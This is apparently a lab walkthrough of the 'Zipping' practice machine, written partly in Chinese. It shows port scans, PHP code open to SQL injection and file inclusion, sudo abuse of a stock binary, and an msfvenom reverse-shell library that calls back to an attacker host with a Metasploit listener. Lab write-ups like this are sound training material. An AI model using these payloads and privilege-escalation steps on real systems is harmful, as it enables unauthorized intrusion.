kali@kali ~/D/H/M/Zipping> nmap -Pn -p- -n --min-rate 3000 -T4 --open10.129.229.87 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-1322:46 CST Nmap scan report for10.129.229.87 Host isup (0.33s latency). Not shown: 65507 filtered tcp ports (no-response), 26 closed tcp ports (conn-refused) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 44.51 seconds kali@kali ~/D/H/M/Zipping> sudo nmap -sU -Pn -p- -n --min-rate 3000 -T4 --open10.129.229.87 [sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-1322:48 CST Nmap scan report for10.129.229.87 Host isup. All 65535 scanned ports on10.129.229.87 are in ignored states. Not shown: 65535open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 44.62 seconds
<?php // Check to make sure the id parameter is specified in the URL if (isset($_GET['id'])) { $id = $_GET['id']; // Filtering user input for letters or special characters if(preg_match("/^.*[A-Za-z!#$%^&*()\-_=+{}\[\]\\|;:'\",.<>\/?]|[^0-9]$/", $id, $match)) { header('Location: index.php'); } else { // Prepare statement and execute, but does not prevent SQL injection $stmt = $pdo->prepare("SELECT * FROM products WHERE id = '$id'"); $stmt->execute(); // Fetch the product from the database and return the result as an Array $product = $stmt->fetch(PDO::FETCH_ASSOC); // Check if the product exists (array is not empty) if (!$product) { // Simple error to display if the id for the product doesn't exists (array is empty) exit('Product does not exist!'); } } } else { // Simple error to display if the id wasn't specified exit('No ID provided!'); } ?>
<?php session_start(); // Include functions and connect to the database using PDO MySQL include'functions.php'; $pdo = pdo_connect_mysql(); // Page is set to home (home.php) by default, so when the visitor visits, that will be the page they see. $page = isset($_GET['page']) && file_exists($_GET['page'] . '.php') ? $_GET['page'] : 'home'; // Include and show the requested page include$page . '.php'; ?>
kali@kali ~/D/H/M/Zipping> ssh rektsu@10.129.165.180 -i rektsu The authenticity of host '10.129.165.180 (10.129.165.180)' can't be established. ED25519 key fingerprint is SHA256:neBkvGOhG23jqZ9Zxfrq+YBNDztKnhVlR+R8Edop1Lo. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:16: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.129.165.180' (ED25519) to the list of known hosts. Welcome to Ubuntu 22.10 (GNU/Linux 5.19.0-46-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the 'unminimize' command. Last login: Tue Sep 5 14:24:24 2023 from 10.10.14.40 rektsu@zipping:~$ ls user.txt
用户可以执行/usr/bin/stock文件:
rektsu@zipping:~$ sudo -l Matching Defaults entries for rektsu on zipping: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User rektsu may run the following commands on zipping: (ALL) NOPASSWD: /usr/bin/stock
rektsu@zipping:~$ printf"St0ckM4nager\n1\n2\n1\n1\n1\n1\n56\n1\n3\n"|sudo LD_PRELOAD="/home/rektsu/.config/libcounter.so" /usr/bin/stock sudo: sorry, you are not allowed to set the following environment variables: LD_PRELOAD
kali@kali ~/D/H/M/Zipping> msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=4444 -f elf-so -o libcounter.so.so [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf-so file: 476 bytes Saved as: libcounter.so.so
msfconsole监听端口:
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload linux/x64/shell_reverse_tcp msf6 exploit(multi/handler) > set lhost tun0 msf6 exploit(multi/handler) > set lport 4444 msf6 exploit(multi/handler) > run -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf6 exploit(multi/handler) > [*] Started reverse TCP handler on 10.10.16.21:4444 [*] Command shell session 1 opened (10.10.16.21:4444 -> 10.129.197.170:59916) at 2024-07-16 22:57:12 +0800
Perform lazy binding. Resolve symbols only as the code that references them is executed. If the symbol is never referenced, then it is never resolved. (Lazy binding is performed only for function references; references to variables are always immediately bound when the shared object is loaded.) Since glibc 2.1.1, this flag is overridden by the effect of the LD_BIND_NOW environment variable.
/* The MODE argument to `dlopen' contains one of the following: */ #define RTLD_LAZY 0x00001 /* Lazy function call binding. */ #define RTLD_NOW 0x00002 /* Immediate function call binding. */ #define RTLD_BINDING_MASK 0x3 /* Mask of binding time value. */ #define RTLD_NOLOAD 0x00004 /* Do not load the object. */ #define RTLD_DEEPBIND 0x00008 /* Use deep binding. */
#include<stdio.h> //compile into a so: gcc preload.c -o preload.so -fPIC -shared -ldl
void __attribute__ ((constructor)) my_init(void);
voidmy_init() { printf("Init part: I love Unicorns"); }
int _init_proc() { printf("I love Unicorns"); return0; }
实际运行发现确实执行了:
但在IDA里看似乎和我前面理解.init的作用不一样,可能还需要对so文件结构进一步了解。
搜索过程中都指向了下面这个手册,是一个很好的资源:
ProgramLibrary HOWTO David A. Wheeler version 1.20, 11 April 2003
This HOWTO for programmers discusses how to create and use program libraries on Linux. This includes static libraries, shared libraries, and dynamically loaded libraries.